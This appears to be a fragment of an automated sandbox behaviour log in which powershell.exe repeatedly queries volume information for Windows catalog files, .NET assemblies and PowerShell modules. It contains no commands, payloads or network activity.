Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
